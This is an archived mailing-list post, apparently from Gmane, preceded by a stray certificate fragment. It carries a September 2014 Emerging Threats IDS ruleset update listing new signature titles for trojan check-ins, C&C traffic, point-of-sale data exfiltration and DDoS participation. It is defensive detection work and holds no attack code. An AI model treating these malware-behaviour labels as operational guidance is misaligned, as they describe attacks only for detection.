<div>CzAJBgNVBAsTAnN3MQwwCgYDVQQDEwNhbGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBj</div>
<div>aGluYW5ldGNlbnRlci5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMIE</div>
<div>ahBc7BN9HGehidvWb+Kejsrqp+SPDdVo9qNOg5PyNk/vx5nLVr1f7d/wIpjmHemp</div>
<div>GY18mEtETwhBCJBK7e6Sim27fZ8j4p+canSOADDDMsaozRtz8IcGbFoMJJ1efPYJ</div>
<div>y4XZKJ35JcT8yNeYQxUxgk7TDfXLXiekqyuTyAtFAgMBAAGjgdQwgdEwHQYDVR0O</div>
<div>BBYEFIE013LLxUR/1H803aDqvVXHdlpkMIGhBgNVHSMEgZkwgZaAFIE013LLxUR/≤/div>
<div>1H803aDqvVXHdlpkoXukeTB3MQswCQYDVQQGEwJjbjELMAkGA1UECBMCZmoxCzAJ</div>
<div>BgNVBAcTAnhtMQwwCgYDVQQKEwNjbmMxCzAJBgNVBAsTAnN3MQwwCgYDVQQDEwNh</div>
<div>bGwxJTAjBgkqhkiG9w0BCQEWFmNkbkBjaGluYW5ldGNlbnRlci5jb22CAQAwDAYD</div>
<div>VR0TBAUwAwEB/zANBgkqhkiG9w0BAQQFAAOBgQBPlVBuR1siGKHUxllvjeX3Hg8S</div>
<div>PKBUy8vigLLPIq4/fJRykSxra8Tylx3UAV2TFAP/U6koCgva3xjArqX8nirYUVho</div>
<div>yr/Yf9P512DDmw9MtQSQtPLQBFvWZx1Sbhc+6IKuiQ1Szg4PN4sXgQwxHmbecuwJ</div>
<div>xCK2eGGkJhWyg4XFNQ==</div>
<div>-----END CERTIFICATE-----</div>
</div>
</div>
<div><br></div>
<div>./d</div>
<div><br></div>
</div>
</div></div>
Francis Trudeau | 20 Sep 00:11 2014
Picon

Daily Ruleset Update Summary 09/19/2014

 [***] Summary: [***]

 5 new Open signatures, 18 new Pro (5+13).  NewPosThings, Sefnit.R,
TROJANCLICKER.MSIL  UFONet DDoS activity.

 Thanks:  Jake Warren.

 [+++]          Added rules:          [+++]

 Open:

  2019197 - ET TROJAN NewPosThings Checkin (trojan.rules)
  2019198 - ET TROJAN NewPosThings Data Exfiltration (trojan.rules)
  2019199 - ET TROJAN NewPosThings POST with Fake UA and Accept Header
(trojan.rules)
  2019200 - ET CURRENT_EVENTS Possible Dyre SSL Cert Sept 19 2014
(current_events.rules)
  2019201 - ET TROJAN Backdoor.Win32/PcClient.AA Checkin (trojan.rules)

 Pro:

  2808848 - ETPRO TROJAN Win32/Sefnit.R Checkin (trojan.rules)
  2808849 - ETPRO TROJAN Win32.CFPass.dcb Checkin (trojan.rules)
  2808850 - ETPRO TROJAN Troj/Buzus-CZ checkin (trojan.rules)
  2808851 - ETPRO TROJAN Win32/Spy.Rehtesyk.A Checkin 1 (trojan.rules)
  2808852 - ETPRO TROJAN Win32/Spy.Rehtesyk.A Checkin 2 (trojan.rules)
  2808853 - ETPRO TROJAN W32/Banker.GAJ!tr Checkin via SMTP (trojan.rules)
  2808854 - ETPRO TROJAN TROJANCLICKER.MSIL/EZBRO.A Checkin  (trojan.rules)
  2808855 - ETPRO TROJAN TROJANCLICKER.MSIL/EZBRO.A Keep-Alive (trojan.rules)
  2808856 - ETPRO WEB_SPECIFIC_APPS Possible UFONet DDoS Participation
(web_specific_apps.rules)
  2808857 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.FakeInst.a
Checkin 5 (mobile_malware.rules)
  2808858 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.FakeInst.a
Response (mobile_malware.rules)
  2808859 - ETPRO TROJAN W32/Scribble-B CnC via IRC (trojan.rules)
  2808860 - ETPRO TROJAN Win32/Ramnit.A Checkin (trojan.rules)

 [///]     Modified active rules:     [///]

  2017505 - ET TROJAN Gh0st Trojan CnC 2 (trojan.rules)
  2806414 - ETPRO TROJAN FakeAV-BT Checkin (trojan.rules)
  2808721 - ETPRO MOBILE_MALWARE Android/Tekwon.A Checkin 2
(mobile_malware.rules)

Gmane